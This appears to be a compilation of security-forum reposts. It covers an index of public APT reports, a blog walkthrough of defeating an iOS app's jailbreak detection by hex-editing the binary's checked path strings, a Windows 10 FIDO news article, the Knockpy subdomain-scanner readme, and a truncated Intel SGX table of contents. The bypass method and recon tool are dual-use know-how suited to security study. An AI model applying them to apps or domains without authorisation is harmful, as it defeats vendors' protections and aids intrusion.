Nytro

Various public documents, whitepapers and articles about APT campaigns APT Notes This is a repository for various publicly-available documents and notes related to APT, sorted by year. For malware sample hashes, please see the individual reports Contributing For the moment, it would be nice to have a PDF of the article that we add to the list, just to be sure we always have a copy. To contribute, you can either: Fork, add and send me a pull request Open a ticket with the data you want to be added Adding data: Add a link to the public document to README.md page Add the PDF file to the appropriate year Thanks to the contributors for helping with the project! Papers The papers section contains historical documents. 2006 "Wicked Rose" and the NCPH Hacking Group 2008 Aug 10 - Russian Invasion of Georgia Russian Cyberwar on Georgia Oct 02 - How China will use cyber warfare to leapfrog in military competitiveness Nov 04 - China's Electronic Long-Range Reconnaissance Nov 19 - Agent.BTZ 2009 Jan 18 - Impact of Alleged Russian Cyber Attacks Mar 29 - Tracking GhostNet 2010 Jan 12 - Operation Aurora Jan 13 - The Command Structure of the Aurora Botnet - Damballa Jan 20 - McAfee Labs: Combating Aurora Jan 27 - Operation Aurora Detect, Diagnose, Respond Jan ?? - Case Study: Operation Aurora - Triumfant Feb 24 - How Can I Tell if I Was Infected By Aurora? (IOCs) Mar 14 - In-depth Analysis of Hydraq Apr 06 - Shadows in the cloud: Investigating Cyber Espionage 2.0 Sep 03 - The "MSUpdater" Trojan And Ongoing Targeted Attacks Sep 30 - W32.Stuxnet Dossier Dec 09 - The Stuxnet Computer Worm: Harbinger of an Emerging Warfare Capability 2011 Feb 10 - Global Energy Cyberattacks: Night Dragon Feb 18 - Night Dragon Specific Protection Measures for Consideration Apr 20 - Stuxnet Under the Microscope Aug ?? - Shady RAT Aug 04 - Operation Shady RAT Aug 02 - Operation Shady rat : Vanity Aug 03 - HTran and the Advanced Persistent Threat Sep 09 - The RSA Hack Sep 11 - SK Hack by an Advanced Persistent Threat Sep 22 - The "LURID" Downloader Oct 12 - Alleged APT Intrusion Set: "1.php" Group Oct 26 - Duqu Trojan Questions and Answers Oct 31 - The Nitro Attacks: Stealing Secrets from the Chemical Industry Dec 08 - Palebot trojan harvests Palestinian online credentials 2012 Jan 03 - The HeartBeat APT Feb 03 - Command and Control in the Fifth Domain Feb 29 - The Sin Digoo Affair Mar 12 - Crouching Tiger, Hidden Dragon, Stolen Data Mar 13 - Reversing DarkComet RAT's crypto Mar 26 - Luckycat Redux Apr 10 - Anatomy of a Gh0st RAT Apr 16 - OSX.SabPub & Confirmed Mac APT attacks May 18 - Analysis of Flamer C&C Server May 22 - IXESHEA An APT Campaign May 31 - sKyWIper (Flame/Flamer) Jul 10 - Advanced Social Engineering for the Distribution of LURK Malware Jul 11 - Wired article on DarkComet creator Jul 27 - The Madi Campaign Aug 09 - Gauss: Abnormal Distribution Sep 06 - The Elderwood Project Sep 07 - IEXPLORE RAT Sep 12 - The VOHO Campaign: An in depth analysis Sep 18 - The Mirage Campaign Oct 08 - Matasano notes on DarkComet, Bandook, CyberGate and Xtreme RAT Oct 27 - Trojan.Taidoor: Targeting Think Tanks Nov 01 - RECOVERING FROM SHAMOON Nov 03 - Systematic cyber attacks against Israeli and Palestinian targets going on for a year 2013 Jan 14 - The Red October Campaign Jan 14 - Red October Diplomatic Cyber Attacks Investigation Jan 18 - Operation Red October Feb 12 - Targeted cyber attacks: examples and challenges ahead Feb 18 - Mandiant APT1 Report Feb 22 - Comment Crew: Indicators of Compromise Feb 26 - Stuxnet 0.5: The Missing Link Feb 27 - The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor Feb 27 - Miniduke: Indicators v1 Mar 13 - You Only Click Twice: FinFisher’s Global Proliferation Mar 17 - Safe: A Targeted Threat Mar 20 - Dissecting Operation Troy Mar 20 - The TeamSpy Crew Attacks Mar 21 - Darkseoul/Jokra Analysis And Recovery Mar 27 - APT1: technical backstage (Terminator/Fakem RAT) Mar 28 - TR-12 - Analysis of a PlugX malware variant used for targeted attacks Apr 01 - Trojan.APT.BaneChant Apr 13 - "Winnti" More than just a game Apr 24 - Operation Hangover May ?? - Operation Hangover May 30 - TR-14 - Analysis of a stage 3 Miniduke malware sample Jun ?? - The Chinese Malware Complexes: The Maudi Surveillance Operation Jun 01 - Crude Faux: An analysis of cyber conflict within the oil & gas industries Jun 04 - The NetTraveller (aka 'Travnet') Jun 07 - KeyBoy, Targeted Attacks against Vietnam and India Jun 18 - Trojan.APT.Seinup Hitting ASEAN Jun 21 - A Call to Harm: New Malware Attacks Target the Syrian Opposition Jun 28 - njRAT Uncovered Jul 09 - Dark Seoul Cyber Attack: Could it be worse? Jul 15 - PlugX revisited: "Smoaler" Jul 31 - Secrets of the Comfoo Masters Jul 31 - Blackhat: In-Depth Analysis of Escalated APT Attacks (Lstudio,Elirks), Aug ?? - Operation Hangover - Unveiling an Indian Cyberattack Infrastructure Aug ?? - APT Attacks on Indian Cyber Space Aug 02 - Where There is Smoke, There is Fire: South Asian Cyber Espionage Heats Up Aug 02 - Surtr: Malware Family Targeting the Tibetan Community Aug 19 - ByeBye Shell and the targeting of Pakistan Aug 21 - POISON IVY: Assessing Damage and Extracting Intelligence Aug 23 - Operation Molerats: Middle East Cyber Attacks Using Poison Ivy Sep ?? - Feature: EvilGrab Campaign Targets Diplomatic Agencies Sep 11 - The "Kimsuky" Operation Sep 13 - Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets Sep 17 - Hidden Lynx - Professional Hackers for Hire Sep 25 - The 'ICEFROG' APT: A Tale of cloak and three daggers Sep 30 - World War C: State of affairs in the APT world Oct 24 - Terminator RAT or FakeM RAT Nov 10 - Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method Nov 11 - Supply Chain Analysis Dev 02 - njRAT, The Saga Continues Dec 11 - Operation "Ke3chang" Dec 20 - ETSO APT Attacks Analysis ??? ?? - Deep Panda ??? ?? - Detecting and Defeating the China Chopper Web Shell 2014 Jan 06 - PlugX: some uncovered points Jan 13 - Targeted attacks against the Energy Sector Jan 14 - The Icefog APT Hits US Targets With Java Backdoor Jan 15 - “New'CDTO:'A'Sneakernet'Trojan'Solution Jan 21 - Shell_Crew (Deep Panda) Jan 31 - Intruder File Report- Sneakernet Trojan Feb 11 - Unveiling "Careto" - The Masked APT Feb 13 - Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website Feb 19 - The Monju Incident Feb 19 - XtremeRAT: Nuisance or Threat? Feb 20 - Operation GreedyWonk: Multiple Economic and Foreign Policy Sites Compromised, Serving Up Flash Zero-Day Exploit Feb 20 - Mo' Shells Mo' Problems - Deep Panda Web Shells Feb 23 - Gathering in the Middle East, Operation STTEAM Feb 28 - Uroburos: Highly complex espionage software with Russian roots Mar 06 - The Siesta Campaign Mar 07 - Snake Campaign & Cyber Espionage Toolkit Mar 08 - Russian spyware Turla Apr 26 - CVE-2014-1776: Operation Clandestine Fox May 13 - Operation Saffron Rose (aka Flying Kitten) May 13 - CrowdStrike's report on Flying Kitten May 20 - Miniduke Twitter C&C May 21 - RAT in jar: A phishing campaign using Unrecom Jun 06 - Illuminating The Etumbot APT Backdoor (APT12) Jun 09 - Putter Panda Jun 20 - Embassy of Greece Beijing Jun 30 - Dragonfly: Cyberespionage Attacks Against Energy Suppliers Jun 10 - Anatomy of the Attack: Zombie Zero Jul 07 - Deep Pandas Jul 10 - TR-25 Analysis - Turla / Pfinet / Snake/ Uroburos Jul 11 - Pitty Tiger Jul 20 - Sayad (Flying Kitten) Analysis & IOCs Jul 31 - Energetic Bear/Crouching Yeti Jul 31 - Energetic Bear/Crouching Yeti Appendix Aug 04 - Sidewinder Targeted Attack Against Android Aug 05 - Operation Arachnophobia Aug 06 - Operation Poisoned Hurricane Aug 07 - The Epic Turla Operation Appendix Aug 12 - New York Times Attackers Evolve Quickly (Aumlib/Ixeshe/APT12) Aug 13 - A Look at Targeted Attacks Through the Lense of an NGO Aug 18 - The Syrian Malware House of Cards Aug 20 - El Machete Aug 25 - Vietnam APT Campaign Aug 27 - NetTraveler APT Gets a Makeover for 10th Birthday Aug 27 - North Korea’s cyber threat landscape Aug 28 - Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks Aug 29 - Syrian Malware Team Uses BlackWorm for Attacks Sep 03 - Darwin’s Favorite APT Group (APT12) Sep 04 - Forced to Adapt: XSLCmd Backdoor Now on OS X Sep 08 - Targeted Threat Index: Characterizingand Quantifying Politically-MotivatedTargeted Malware video Sep 08 - When Governments Hack Opponents: A Look at Actors and Technology video Sep 10 - Operation Quantum Entanglement Sep 17 - Chinese intrusions into key defense contractors Sep 18 - COSMICDUKE: Cosmu with a twist of MiniDuke Sep 19 - Watering Hole Attacks using Poison Ivy by "th3bug" group Sep 23 - Sep 26 - Aided Frame, Aided Direction (Sunshop Digital Quartermaster) Sep 26 - BlackEnergy & Quedagh Oct 03 - New indicators for APT group Nitro Oct 09 - Democracy in Hong Kong Under Attack Oct 14 - ZoxPNG Preliminary Analysis Oct 14 - Hikit Preliminary Analysis Oct 14 - Derusbi Preliminary Analysis Oct 14 - Group 72 (Axiom) Oct 14 - Sandworm - CVE-2104-4114 Oct 20 - OrcaRAT - A whale of a tale Oct 22 - Operation Pawn Storm: The Red in SEDNIT Oct 22 - Sofacy Phishing by PWC Oct 23 - Modified Tor Binaries Oct 24 - LeoUncia and OrcaRat Oct 27 - Full Disclosure of Havex Trojans - ICS Havex backdoors Oct 27 - ScanBox framework – who’s affected, and who’s using it? Oct 28 - APT28 - A Window Into Russia's Cyber Espionage Operations Oct 28 - Group 72, Opening the ZxShell Oct 30 - The Rotten Tomato Campaign Oct 31 - Operation TooHash Nov 03 - New observations on BlackEnergy2 APT activity Nov 03 - Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement Nov 10 - The Darkhotel APT - A Story of Unusual Hospitality Nov 11 - The Uroburos case- Agent.BTZ’s successor, ComRAT Nov 12 - Korplug military targeted attacks: Afghanistan & Tajikistan Nov 13 - Operation CloudyOmega: Ichitaro 0-day targeting Japan Nov 14 - OnionDuke: APT Attacks Via the Tor Network Nov 14 - Roaming Tiger (Slides) Nov 21 - Operation Double Tap | IOCs Nov 23 - Symantec's report on Regin Nov 24 - Kaspersky's report on The Regin Platform Nov 24 - TheIntercept's report on The Regin Platform Nov 24 - Deep Panda Uses Sakula Malware Nov 30 - FIN4: Stealing Insider Information for an Advantage in Stock Trading? Dec 02 - Operation Cleaver | IOCs Dec 03 - Operation Cleaver: The Notepad Files Dec 08 - The 'Penquin' Turla Dec 09 - The Inception Framework Dec 10 - Cloud Atlas: RedOctober APT Dec 10 - W32/Regin, Stage #1 Dec 10 - W64/Regin, Stage #1 Dec 10 - South Korea MBR Wiper Dec 12 - Vinself now with steganography Dec 12 - Bots, Machines, and the Matrix Dec 17 - Wiper Malware – A Detection Deep Dive Dec 18 - Malware Attack Targeting Syrian ISIS Critics Dec 19 - TA14-353A: Targeted Destructive Malware (wiper) Dec 21 - Operation Poisoned Helmand Dec 22 - Anunak: APT against financial institutions 2015 Jan 11 - Hong Kong SWC attack Jan 12 - Skeleton Key Malware Analysis Jan 15 - Evolution of Agent.BTZ to ComRAT Jan 20 - Analysis of Project Cobra Jan 20 - Reversing the Inception APT malware Jan 22 - The Waterbug attack group Jan 22 - Scarab attackers Russian targets | IOCs Jan 22 - Regin's Hopscotch and Legspin Jan 27 - Comparing the Regin module 50251 and the "Qwerty" keylogger Jan 29 - Backdoor.Winnti attackers and Trojan.Skelky Jan 29 - Analysis of PlugX Variant - P2P PlugX Feb 02 - Behind the Syrian Conflict’s Digital Frontlines Feb 04 - Pawn Storm Update: iOS Espionage App Found Feb 10 - CrowdStrike Global Threat Intel Report for 2014 Feb 16 - Equation: The Death Star of Malware Galaxy Feb 16 - The Carbanak APT Feb 16 - Operation Arid Viper Feb 17 - Desert Falcons APT Sursa: https://github.com/kbandla/APTnotes

a trivial iOS jailbreak detection bypass introduction Not too long ago, I toyed with a Android root detection bypass. In a similar scenario, I was poking at a iOS application that also had some root detection built in. For very much the same purpose, I suppose the application has its own ~reasons~ for the jailbreak detection. Of course, this makes the testing I actually wanted to do impossible as I’d very much like to dig under the hood So, its was time to try and bypass the jailbreak detection of the application. All I had to work with was a .ipa. Similar to the android .apk file, the .ipa is also just a zipped up archive of the actual application files. To test with, I had a iPad mini. The iPad was running the latest iOS (8.1.2 at the time of this post) and was also jailbroken. If I remember correctly the jailbreak tool used was called TaiG. Anyways, inside the applications .ipa archive was a whole bunch of resource files and what not, including the compiled application executable. This executable is what is of interest. understanding the behavior I installed the app onto my iPad, and started to inspect its behavior. When the application starts, it would immediately throw a security related error, notifying the user that it has detected the environment as one that is jailbroken. This happens pretty fast too. Once the jailbreak detection error shows, the application refuses to continue to run. Restarting the application simply continues this loop. I studied some iOS jailbreak detection methods online which revealed many of them as being pretty obvious. From detecting the presence of /bin/bash or Cydia.app, to examining the exit status if fork(). There are some more advanced methods as well such as checking the existence of certain known dylib’s too (which apparently is the hardest to circumvent). For the purpose of this post, the jailbreak detection was pretty weak and did not have any of the more advanced methods implemented. In fact, I am pretty sure there won’t be that many apps out there that will be this easy to bypass. discovering the implementation Armed with some knowledge of how its typically done in the iOS world, I proceeded to take a look at the actual application binary: [TABLE] [TR] [TD=class: gutter]1 2[/TD] [TD=class: code]leonjza@laptop » file myApplication myApplication: Mach-O executable arm[/TD] [/TR] [/TABLE] Compiled as a Mach-O executable from Objective-C, I loaded up the binary from the extracted .ipa into the Hopper disassembler to help me get an idea of what is happening. Hopper has some nice features such as generating pseudo code etc, so I quite like using it for these types of excursions. To start off, I searched around for strings that were related to the word jailbreak within the app. Class definitions, methods or any strings related to the term jailbreak was ok. I just wanted to get something to start off with. I found nothing. Of course this had me thinking that I may have missed the plot entirely. I continued to search for other things related to jailbreaking, and got a hit immediately for the term /bin/bash in the string section: In fact, there are quite a few other jailbreak related strings in this section. From within Hopper, one can check where these strings are referenced from. So, I followed this and landed up in a function that does what I would have expected a jailbreak detection function to do, but with a completely unexpected class/method name. –[MobileDisplay isRetinaDisplay]:. Very sneaky So we are working with the isRetinaDisplay method which is the one doing the jailbreak detection: As can be seen in the above screenshot, the fileExistsAtPath for /Applications/Cydia.app is hardly something I would have expected in a isRetinaDisplay implementation planning an attack At this stage, I was fairly certain that I had found the code I was looking for. From the method name isRetinaDisplay, I reasoned a little and guessed that this was actually supposed to say isJailBroken. I want this method to return false. My mind went straight to getting cycript ready for some method swizzling. I started to set things up and played around a little, when I realized that I don’t think I will be able to manipulate the runtime fast enough for this to work. Remember, the first thing the app does is check the jailbreak status. A bit of thinking, a few coffees, special alone time with Google and lots of reading, I come to realize that even if I was able to get this method swizzling to work, I’d have to do this every time the application starts up. This was not going to work for me. It was time to rethink my strategy. Considering how the jailbreak detection works, most of the ways that I saw in the application were related to file existence checks. There was also an attempt to write to /private/jailbreak.txt, as well as open a cydia:// url. I realized that I could probably just change these strings to things that will inherently fail and cause the method to not return true for any of the checks. in 1992 we had hex editors too I ssh’d into my iPad and located the applications installed directory. Once I had found this, I scp’d the compiled binary to my kali linux install, and opened it in a hex editor. I realized later I could have probably just used the binary I already had locally Referencing the disassembly of isRetinaDisplay, I searched for the strings it used using a Hex editor. Each string I would replace a few characters with 0 ensuring that I keep the original string length intact. For eg: /bin/bash was replaced with /bin/ba00. I ended up editing the following strings using the hex editor: /Applications/Cydia.app –> /Applications/Cyd00.app /Library/MobileSubstrate/MobileSubstrate.dylib –> /Library/MobileSubstrate/MobileSubstra00.dylib /bin/bash –> /bin/ba00 /usr/sbin/sshd –> /usr/sbin/ss00 /etc/apt –> /etc/a00 /private/jailbreak.txt –> /0000000/0000000000000 cydia://package/com.example.package –> cyd00://package/com.example.package I saved the modifications that I had done, and scp’d the binary back to my iPad to the folder where it was installed. I literally just overwrote the existing binary. At this stage I figured I will most certainly have some form of signing related problem as the binary has been tampered with. Well, this was not the case. Instead, I no longer was greeted with the lame jailbreak security error summary In the end, it was pretty easy to find the jailbreak detection code. Deducing a few things based on the disassembly made it easy to find the method responsible for the checks, regardless of the attempt to hide it via a name change. Furthermore, using something as simple as a hex editor, a trivial implementation such as this was very easily bypassed Posted by Leon Jacobs Feb 20th, 2015 bypass, hex, ios, jailbreak Sursa: https://leonjza.github.io/blog/2015/02/20/a-trivial-ios-jailbreak-detection-bypass/

Windows 10 embraces password-killing biometric authentication Ian Paul @ianpaul Ian is an independent writer based in Tel Aviv, Israel. His current focus is on all things tech including mobile devices, desktop and laptop computers, software, social networks, Web apps, tech-related legislation and corporate tech news. Microsoft is about to officially join the fight for authentication without pesky passwords. The company recently announced that Windows 10 will support the Fast Identity Online (FIDO) 2.0 specification. The end result is that instead of using passwords to log in to PCs, Microsoft services, and other third-party accounts, you’ll also be able to use a fingerprint or eye scan—possibly integrated with a key fob for two-factor authentication. In its blog post announcing FIDO in Windows 10, Microsoft focused largely on features that would interest IT types, such as FIDO support for major enterprise-focused cloud services including Office 365 Exchange Online, Salesforce, Citrix, and Box. But FIDO in Windows 10 will also work with consumer services such as Windows 10 sign-ins, Outlook.com, and OneDrive. Why this matters: The call to kill passwords with a better authentication solution have been ongoing for some time. FIDO appears to be the best chance for a one-size fits all solution to password-less authentication. The FIDO Alliance includes many major tech companies and other businesses with a big interest in security, including Arm, Bank of America, Google, Lenovo, Mastercard, PayPal, and Visa. Microsoft joined the FIDO Alliance in late 2013. When heavy hitters work together on problems like this the end result tends to be a near-universal solution—an absolute must if FIDO is to truly replace the password. What is FIDO? The idea behind FIDO isn’t all that new. Instead of using passwords—that can be forgotten, lost, stolen, or even guessed—a FIDO-equipped device would use biometrics such as fingerprint and eye scans that are much harder to acquire. This initial login method could also be paired with a key fob for two-factor authentication for added security. Biometric scanners have already been integrated into smartphones, laptops, and other devices for years. The difference with FIDO is that it’s an open standard, meaning any company can implement it into their products or services. It also means that FIDO-compliant biometric scanners and two-factor authentication devices can be used with any FIDO-supporting service, as opposed to the hodgepodge of fingerprint scanning security mechanisms we have now. The FIDO specifications are also designed so that a user’s biometric data never leaves the device. For anyone that wants to check it out, Microsoft says FIDO integration is already available in the Windows 10 Technical Preview for enterprise applications as well as Windows 10 sign-in. Sursa: Windows 10 embraces password-killing biometric authentication | PCWorld

Knock Subdomain Scan v.3.0rc1 Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. Usage knockpy [-h] [-v] [-w WORDLIST] [-r] [-z] domain positional arguments: domain specific target domain, like domain.com optional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit -w WORDLIST specific path to wordlist file -r, --resolve resolve ip or domain name -z, --zone check for zone transfer note: the ALIAS name is marked in yellow. Example subdomain scan with internal wordlist knockpy domain.com subdomain scan with external wordlist knockpy domain.com -w wordlist.txt resolve domain name and get response headers knockpy -r domain.com check zone transfer for domain name knockpy -z domain.com Install from pypi (as root) pip install https://github.com/guelfoweb/knock/archive/knock3.zip or manually, download zip and extract folder cd knock-knock3/ (as root) python setup.py install note: tested with python 2.7.6 | is recommended to use google dns (8.8.8.8 | 8.8.4.4) Talk about Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch Other This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome. Sponsored by Security Side Sursa: https://github.com/guelfoweb/knock/tree/knock3

Software Guard Extensions CHAPTER 1 INTRODUCTION TO SOFTWARE GUARD EXTENSIONS 1.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-1 1.2 Enclave Interaction and Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-1 1.3 Enclave Life Cycle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2 1.4 Data Structures and Enclave Operation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2 1.5 Enclave Page Cache . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2 1.5.1 Enclave Page Cache Map (EPCM). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-3 1.6 Enclave Instructions and SGX. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-3 1.7 Discovering Support for SGX and enabling Enclave Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-4 1.7.1 SGX Opt-In Configuration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-4 1.7.2 System Software Enabling of SGX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-4 1.7.3 SGX Resource Enumeration Leaves. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1-4 CHAPTER 2 ENCLAVE ACCESS CONTROL AND DATA STRUCTURES 2.1 Overview of Enclave Execution Environment. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1 2.2 Terminology. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1 2.3 Access-control Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-1 2.4 Segment-based Access Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-2 2.5 Page-based Access Control. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-2 2.5.1 Access-control for Accesses that Originate from non-SGX Instructions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.2 Memory Accesses that Split across ELRANGE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.3 Implicit vs. Explicit Accesses. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.3.1 Explicit Accesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2 2.5.3.2 Implicit Accesses . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-3 2.6 SGX Data Structures. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4 2.6.1 SGX Enclave Control Structure (SECS). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-4 2.6.1.1 ATTRIBUTES . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-4 2.6.2 Thread Control Structure (TCS). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.1 TCS.FLAGS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.2 State Save Area Offset (OSSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.3 Number of State Save Areas (NSSA). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.2.4 Current State Save Area (CSSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-5 2.6.3 State Save Area (SSA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-6 2.6.3.1 EXITINFO . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-6 2.6.3.2 VECTOR Field Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.4 Page Information (PAGEINFO) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.5 Security Information (SECINFO). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-7 2.6.5.1 SECINFO.FLAGS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.5.2 PAGE_TYPE Field Definition . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.6 Paging Crypto MetaData (PCMD). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-8 2.6.7 Enclave Signature Structure (SIGSTRUCT). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-9 2.6.8 EINIT Token Structure (EINITTOKEN) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-10 2.6.9 Report (REPORT) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-10 2.6.9.1 REPORTDATA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.10 Report Target Info (TARGETINFO) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11 Key Request (KEYREQUEST) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11.1 KEY REQUEST KeyNames . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11 2.6.11.2 Key Request Policy Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 2.6.12 Version Array (VA) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 2.6.13 Enclave Page Cache Map (EPCM). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12 CHAPTER 3 ENCLAVE OPERATION 3.1 Constructing an Enclave . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-1 3.1.1 EADD and EEXTEND Interaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 